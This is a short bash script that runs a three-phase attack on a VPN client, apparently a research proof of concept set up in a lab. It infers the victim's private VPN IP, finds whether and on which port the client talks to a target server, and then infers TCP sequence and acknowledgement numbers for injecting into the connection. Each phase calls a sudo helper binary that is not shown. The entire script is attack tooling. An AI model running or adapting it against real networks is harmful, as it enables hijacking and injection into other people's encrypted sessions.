REMOTE_ADDR=192.168.3.2 # ip of web-server to check for connection REMOTE_PORT=8080 # web server port VICTIM_WLAN_ADDR=172.16.4.2 # vpn client wlan ip WLAN_GATEWAY=172.16.4.254 # address of local network gateway VICTIM_PRIV_NET=10.8.0.0 PRIV_NETMASK=255.255.255.0 REQUEST_SIZE=529 DEST_MAC=08:00:27:e8:bf:1f INTERFACE=enp0s9 printf "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 1 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n" echo `date` echo "attempting to infer client's private VPN address.." cd ../first_phase PRIV_IP="$(sudo ./send_p1 $DEST_MAC $VICTIM_PRIV_NET $PRIV_NETMASK $WLAN_GATEWAY $INTERFACE)" echo "phase 1 client private IP: ${PRIV_IP}" printf "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 2 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n" echo `date` echo "determining if client is talking to ${REMOTE_ADDR} on any port.." cd ../sec_phase VPORT="$(sudo ./send_p2 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC $INTERFACE)" echo "phase 2 port result: ${VPORT}" printf "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 3 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n" echo `date` echo "beginning phase 3 to infer sequence and ack numbers needed to inject.." cd ../third_phase sudo ./send_p3 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC $VPORT $REQUEST_SIZE $INTERFACE echo `date`